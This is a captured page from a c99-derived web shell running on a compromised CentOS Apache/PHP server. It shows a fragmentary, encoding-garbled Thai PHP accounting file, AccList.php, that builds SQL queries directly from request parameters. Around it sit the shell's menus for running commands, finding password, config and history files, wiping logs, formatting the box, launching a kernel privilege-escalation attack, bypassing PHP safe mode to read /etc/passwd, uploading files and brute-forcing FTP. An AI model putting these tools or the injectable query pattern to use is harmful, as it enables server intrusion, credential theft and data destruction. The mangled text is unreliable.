Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
                            Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    

Viewing file:     AccList.php (21.23 KB)      -rw-r--r--

execQuery($query);
		$rs0 = $dbObj->fetchArray($result0);
		
		/**  Paging */
		$page = $_GET['page'];
		if( $page == "" ) { $page = 1; }
		
		/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
		$perpage = $_REQUEST['perpage'];
		if( $perpage == "" ) { $perpage = 10; }

		/**  Searching */
		$keyword = trim( $_REQUEST['keyword'] );
		$selectType = $_REQUEST['selectType'];
		
		
		$action = $_POST['action'];
		$id = $_POST['id'];
	
		
	
	
		
		

 ?>














  

    

    

    execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
		
		if( $keyword != "" ) { // гКи Keyword
			if( $selectType != "" ) { // аЕЧНЎГТВЎТГг№ List
				switch( $selectType ) {
					case 1 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE BINARY  Dura='$Dura'  and  Status='$Status'  and   Faculty_code='$Faculty_code' 
												AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField1 LIKE '%$keyword%' 
												ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'   and  Status='$Status'   and   Faculty_code='$Faculty_code' 
												AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField1 LIKE '%$keyword%' 
												ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
					case 2 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and  Faculty_code='$Faculty_code' 
												AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField2 LIKE '%$keyword%' 
												ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and  Faculty_code='$Faculty_code' 
												AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField2 LIKE '%$keyword%' 
												ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
					case 3 :
						if( isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and  Faculty_code='$Faculty_code' 
												AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField3 LIKE '%$keyword%' 
												ORDER BY  $OrderBy  $ASCDESC ";
						} 
						elseif( !isset($_GET['OrderBy']) ) {
							$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'   and  Status='$Status'  and  Faculty_code='$Faculty_code' 
												AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
												AND  $myTableField3 LIKE '%$keyword%' 
												ORDER BY  $myTalbleOrder  ASC ";
						}
					break;
				} # switch
			} else {  // ЛТа©ѕТР·ХигКи Keyword
				if( isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and   Faculty_code='$Faculty_code'  
										AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
										ORDER BY  $OrderBy  $ASCDESC ";
				} 
				elseif( !isset($_GET['OrderBy']) ) {
					$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and  Faculty_code='$Faculty_code'  
										AND  ( $myTableField1 LIKE '%$keyword%'  OR  $myTableField2 LIKE '%$keyword%'  OR  $myTableField3 LIKE '%$keyword%' ) 
										ORDER BY  $myTalbleOrder  ASC ";
				}
			}
		} #if
		else {
			if( isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and  Faculty_code='$Faculty_code'  ORDER BY  $OrderBy  $ASCDESC ";
			} 
			elseif( !isset($_GET['OrderBy']) ) {
				$query = " SELECT *  FROM $myTable  WHERE BINARY   Dura='$Dura'  and  Status='$Status'  and  Faculty_code='$Faculty_code'  ORDER BY  $myTalbleOrder  ASC ";
			}
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
    

     

      

        

      
      

        
Л№йТЛЕСЎ » ўйНБЩЕ¤ГШАСі±мЛ№иЗВ§Т№  » ГТВЎТГ¤ШГШАСі±м
        
  value="Y" />
          ¤ГШАСі±м  
            value="N" />
          ЗСКґ
      
      

        

          
          

            
 
          
          

            

              

                
 ‹ ВйН№ЎЕСє
                
ЁУ№З№ўйНБЩЕµиНЛ№йТ
                  
                    >20
                    >50
                    >100
                  
              
              

                
¤й№ЛТ
                  
                  
                    --- аЕЧНЎ·Сй§ЛБґ ---
                    >ГЛСКНШ»ЎГім
                    >ЄЧиННШ»ЎГім
                    >»Х·Хи«ЧйН
                  
                  
                
 аЕЧНЎЛ№иЗВ§Т№
                  
                    
                      
                      
                    >
                      
                      
                    
                  
              
            
            
        
      
      

        

      	 0 ) { ?>
        

          
          

            
·Сй§ЛБґ: 
              
             ГТВЎТГ
            
 
          
        
        fetchArray($result) ) { 
			
				if( $keyword != "" ) {
					$Acc_code = eregi_replace( $keyword, "\\0", $rs['Acc_code'] );
					$Acc_name = eregi_replace( $keyword, "\\0", $rs['Acc_name'] );
				} else {
					$Acc_code = $rs['Acc_code'];
					$Acc_name = $rs['Acc_name'];
				}
			
				$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          ?>
          freeresult($result1);
          ?>
        

          

            
No
			
ГЛСК
            
ЄЧиННШ»ЎГім / ВХиЛйН
			
»Х·Хи«ЧйН
			
ЗС№ЛБґНТВШ
			
ГТ¤Т
            
          

            

            
 
            

            
execQuery($query);
	           $rss = $dbObj->fetchArray($result1);
				$sday = $rs['Date_buy'];
				$yearthai = explode( "-", $sday );
				$day = intval( $yearthai[2] );
				$month = intval( $yearthai[1] );
				$year = intval( $yearthai[0] )+ $rss ['Year'];	 
				$m = getThaiSubMonth( $month );
				echo $day ." ". $m ." ". $year;
			?>              
            

            
          
        
        

          

            
 0 ) { ?>
              

                

                  

                
                

                  
Л№йТ:
                     1) {	
                            $previous = $display - 1;					
                    ?>
                    
bool(false)


:: Command execute ::
Enter:  
Select: 
-----------------------------------------------------------find all suid filesfind suid files in current dirfind all sgid filesfind sgid files in current dirfind config.inc.php filesfind config* filesfind config* files in current dirfind all writable folders and filesfind all writable folders and files in current dirfind all service.pwd filesfind service.pwd files in current dirfind all .htpasswd filesfind .htpasswd files in current dirfind all .bash_history filesfind .bash_history files in current dirfind all .fetchmailrc filesfind .fetchmailrc files in current dirlist file attributes on a Linux second extended file systemshow opened ports 



:: Shadow's tricks :D  ::

  

    
Useful Commands 
    
    

      

        
        
          
            Kernel version
              Logged in users
                Last to connect
                  Suid bins
                    USER WITHOUT PASSWORD!
                    Write in /etc/?
                    Downloaders?
                    CPUINFO
                    Open ports
                    gcc installed?
					Format box (DANGEROUS)
                    WIPELOGS PT1 (If wget installed)
                    WIPELOGS PT2
                    WIPELOGS PT3
                    Kernel attack (Krad.c) PT1 (If wget installed)
                    Kernel attack (Krad.c) PT2 (L1)
                    Kernel attack (Krad.c) PT2 (L2)
                    Kernel attack (Krad.c) PT2 (L3)
                    Kernel attack (Krad.c) PT2 (L4)
                    Kernel attack (Krad.c) PT2 (L5)
                  
        
         
        
          

        Warning. Kernel may be alerted using higher levels 
    
    
  

   Kernel Info: 

      
      
	  
	  
	  
	  
    
    



:: Preddy's tricks :D  ::

  

    
Php Safe-Mode Bypass (Read Files)
    


    

      

      File:  

 eg: /etc/passwd

      
      
      
           
      
      
      	
	
          

      
    
    
  

   Php Safe-Mode Bypass (List Directories):     

      


      Dir:  

 eg: /etc/


    
    




 
:: Search ::
  - regexp 

 
:: Upload ::
 
[ ok ]



:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--